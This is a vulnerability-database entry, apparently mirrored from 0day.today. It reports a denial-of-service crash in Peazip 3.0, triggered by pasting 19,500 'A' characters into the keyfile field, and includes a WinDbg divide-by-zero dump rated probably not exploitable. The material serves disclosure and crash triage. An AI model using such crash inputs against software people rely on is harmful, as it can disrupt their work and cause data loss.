Lucene search
K

Peazip 3.0 Denial of Service attack

🗓️ 30 Mar 2010 00:00:00Reported by Richard leahyType 
zdt
 zdt
🔗 0day.today👁 20 Views

Peazip 3.0 Denial of Service vulnerabilit

Code
===================================
Peazip 3.0 Denial of Service attack
===================================

# Code : no code just print out the A's and paste them into the input box

Peazip 3.0 suffers from a division by zero attack resulting in denial of service vulnerability and possibly loss of data.

To trigger the vulnerability open up the application, click tools, enter password / keyfile.

password: test

confirm password: test

keyfile:"A" * 19500


kind regards

richard leahy


(d80.8c): Integer divide-by-zero - code c0000094 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000032 ebx=00000032 ecx=00000000 edx=00000000 esi=0173f754 edi=01dd7dd8
eip=00524ea2 esp=0173f438 ebp=0173f440 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for image00400000
image00400000+0x124ea2:
00524ea2 f7f9            idiv    eax,ecx
0:000> !exploitable
No export exploitable found
0:000> !load winext/msec.dll
0:000> !exploitable
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\windows\system32\USER32.dll -
Exploitability Classification: PROBABLY_NOT_EXPLOITABLE
Recommended Bug Title: Integer Divide By Zero starting at image00400000+0x0000000000124ea2 (Hash=0x00020e6f.0x637a584a)

This is a divide by zero, and is probably not exploitable. 



#  0day.today [2018-03-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Mar 2010 00:00Current
7.1High risk
Vulners AI Score7.1
20